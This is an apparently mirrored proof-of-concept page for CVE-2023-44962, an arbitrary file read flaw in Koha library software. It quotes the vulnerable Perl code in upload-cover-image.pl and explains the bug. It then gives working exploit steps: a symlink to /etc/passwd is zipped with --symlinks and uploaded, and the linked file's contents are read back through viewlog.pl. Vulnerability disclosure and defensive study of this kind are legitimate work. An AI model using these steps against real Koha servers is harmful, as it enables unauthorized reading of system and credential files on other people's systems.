CVE-2023-44962 PoC — Koha 代码问题漏洞

Source

https://github.com/ggb0n/CVE-2023-44962

Associated Vulnerability

Title:Koha 代码问题漏洞 (CVE-2023-44962)
Description:Koha是Koha组织的一个用于图书馆自动化管理建站系统。 Koha Library Software 23.0.5.04 及之前版本存在安全漏洞，该漏洞源于允许远程攻击者通过 upload-cover-image.pl 组件读取任意文件。

Description

PoC for CVE-2023-44962

Readme

# CVE-2023-44962
PoC for CVE-2023-44962

# Description
This is a Arbitrary File Read Vulnerability in Koha Library Software v.23.05.04 and before which allows a remote attacker to read arbitrary files from koha server.

# Analysis

Uploading archive files containing symbolic links in `upload-cover-image.pl` can leak some of the content of the linked files.

```perl
...
foreach my $dir (@directories) {
  my $file;
  if ( -e "$dir/idlink.txt" ) {
      $file = "$dir/idlink.txt";
  }
  elsif ( -e "$dir/datalink.txt" ) {
      $file = "$dir/datalink.txt";
  }
  else {
      next;
  }
  if ( open( my $fh, '<', $file ) ) {
      while ( my $line = <$fh> ) {
          my $delim =
              ( $line =~ /\t/ ) ? "\t"
            : ( $line =~ /,/ )  ? ","
            :                     "";

          unless ( $delim eq "," || $delim eq "\t" ) {
              warn
  "Unrecognized or missing field delimeter. Please verify that you are using either a ',' or a 'tab'";
              $error = 'DELERR';
          }
          else {
              ( $biblionumber, $filename ) = split $delim, $line, 2;
              $biblionumber =~
                s/[\"\r\n]//g;    # remove offensive characters
              $filename =~ s/[\"\r\n]//g;
              $filename =~ s/^\s+//;
              $filename =~ s/\s+$//;
              if (C4::Context->preference("CataloguingLog")) {
                  logaction('CATALOGUING', 'MODIFY', $biblionumber, "biblio cover image: $filename");
              }
...
```

From the code, it can be seen that when the extracted file contains `idlink. txt` or `datalink. txt` , the file content will be read and divided according to`,` or `\t` . The latter part of the content will be assigned the value of `$filename` , and when the `CataloguingLog` attribute is enabled (default is enabled), the `$filename` will be recorded.

When accessing `viewlog.pl`, you can see the leaked file content

# PoC

First, create an archive file:

```bash
ln -s /etc/passwd datalink.txt
zip --symlinks datalink.zip datalink.txt
```

Then access the following URL to write datalink.zip:

```
http://koha_ip:intranet_port/cgi-bin/koha/tools/upload-cover-image.pl
```

The response code is 500.

Then access the following URL to read the file content:

```
http://192.168.176.139:8081/cgi-bin/koha/tools/viewlog.pl
```

File Snapshot


 [4.0K]  /data/pocs/3e36ff891a9cf26b9f02441269266ab2b18df3a5
└── [2.3K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!